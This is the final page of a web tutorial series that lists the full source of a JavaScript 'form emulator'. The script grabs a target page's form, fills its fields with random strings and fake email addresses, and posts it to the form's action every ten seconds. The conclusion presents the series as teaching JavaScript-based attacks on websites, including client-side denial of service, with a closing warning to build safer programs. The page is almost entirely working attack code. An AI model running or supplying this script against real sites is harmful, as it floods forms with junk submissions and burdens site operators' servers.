Programmatic POST Requests with JavaScript: Form Emulator in Action - The complete form emulator script: listing the full source code
(Page 5 of 5 )
To finish this tutorial, here is the full code for the form emulator script, including some basic (X)HTML markup and CSS declarations:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd">
<html>
<head>
<title>Post Http Requests with JavaScript</title>
<script type="text/javascript">
function getXMLHTTPObject(){
//instantiate new XMLHttpRequest object
var objhttp=(window.XMLHttpRequest)?new XMLHttpRequest
():new ActiveXObject('Microsoft.XMLHTTP');
if(!objhttp){return};
// assign event handler
objhttp.onreadystatechange=displayStatus;
// return XMLHttpRequest object
return objhttp;
}
// function sendRequest
function sendRequest(url,data,method,mode,header){
// set default values
if(!url){url='default_url.htm'};
if(!data){data='defaultdata=defaultvalue'};
if(!method){method='post'};
if(!mode){mode=true};
if(!header){header='Content-Type:application/x-www-form-
urlencoded; charset=UTF-8'};
// get XMLHttpRequest object
objhttp=getXMLHTTPObject();
// open socket connection
objhttp.open(method,url,mode);
// set http header
objhttp.setRequestHeader(header.split(':')
[0],header.split(':')[1]);
// send data
objhttp.send(data);
}
// function displayStatus
function displayStatus(){
// check XMLHttpRequest object status
if(objhttp.readyState==4){
// create paragraph elements
var parStat=document.createElement('p');
var parText=document.createElement('p');
var parResp=document.createElement('p');
// assign ID attributes
parStat.id='status';
parText.id='text';
parResp.id='response';
// append text nodes
parStat.appendChild(document.createTextNode
('Status : '+objhttp.status));
parText.appendChild(document.createTextNode('Status
text : '+objhttp.statusText));
parResp.appendChild(document.createTextNode
('Document code : '+objhttp.responseText));
// insert <p> elements into document tree
document.body.appendChild(parStat);
document.body.appendChild(parText);
document.body.appendChild(parResp);
// get form code
getFormCode();
}
}
// function getFormCode
function getFormCode(){
// create <div> container
var fdiv=document.createElement('div');
// append <div> container into document tree
document.body.appendChild(fdiv);
// get page code
var html=objhttp.responseText;
// insert form code into document tree
fdiv.innerHTML=html.substring(html.search
(/<form\b/),html.search(/<\/form>/));
// hide form from being displayed
fdiv.style.display='none';
}
// function getFormVariables
function getFormVariables(){
var formvars='';
var childElements=document.getElementsByTagName('form')
[0].childNodes;
for(var i=0;i<childElements.length;i++){
if(/(INPUT|TEXTAREA|SELECT)/.test(childElements[i].nodeName)){
// check if field name contains the string 'email'
formvars+=(/mail/.test
(childElements[i].getAttribute('name')))?childElements
[i].getAttribute('name')+'='+getRandomEmail()
+'&':childElements[i].getAttribute('name')
+'='+getRandomValue()+'&';
}
}
formvars=formvars.substring(0,formvars.length-1);
return formvars;
}
// function getFormAction
function getFormAction(){
var formaction=document.getElementsByTagName('form')
[0].getAttribute('action');
if(!formaction){return};
return formaction;
}
// function getRandomValue
function getRandomValue(){
var chars='abcdefghiklmnopqrstuvwxyz0123456789';
var rndstring='';
var strlength=Math.floor(Math.random()*8)+2;
for(var i=0;i<strlength;i++){
var rndvalue=Math.floor(Math.random()*chars.length);
rndstring+=chars.substring(rndvalue,rndvalue+1);
}
return rndstring;
}
// function getRandomEmail
function getRandomEmail(){
return 'johndoe'+getRandomValue()+'@'+getRandomValue()+'.com';
}
window.onload=function(){
if(document.getElementsByTagName&&document.createElement){
// send first get request to form page
sendRequest('post_form.htm','','get',false);
// send post request every 10 seconds
setInterval("sendRequest(getFormAction
(),getFormVariables(),'post',true);",10*1000);
}
}
</script>
<style type="text/css">
h1 {
font: bold 12px Arial, Helvetica, sans-serif;
color: #000;
}
p {
font: normal 11px Arial, Helvetica, sans-serif;
color: #00f;
}
</style>
</head>
<body>
<h1>Emulating POST form submissions with JavaScript...</h1>
</body>
</html>
With reference to the above code, I’ve basically specified the script to be executed when the page has finished loading, as well as declared a couple of CSS styles for controlling the visual presentation of the information. Quite simple, isn’t it?
Conclusion
Over this series, I’ve offered wide-ranging coverage of the real implementation of JavaScript-based http requests as a growing form for attacking websites. The tutorials provided the basics of client-side denial of service attacks, as well as form emulation techniques.
Of course, due to the inherently insecure nature of the Internet, and specifically the Web, numerous attacking techniques are continuously emerging, so the methods described above are only a small piece within this conflictive scenario. Now that you’ve been warned, go and build more robust and safer Web programs.
| DISCLAIMER: The content provided in this article is not warranted or guaranteed by Developer Shed, Inc. The content provided is intended for entertainment and/or educational purposes in order to introduce to the reader key ideas, concepts, and/or product reviews. As such it is incumbent upon the reader to employ real-world tactics for security and implementation of best practices. We are not liable for any negative consequences that may result from implementing any information covered in our articles or tutorials. If this is a hardware review, it is not recommended to open and/or modify your hardware. |
/ 12 
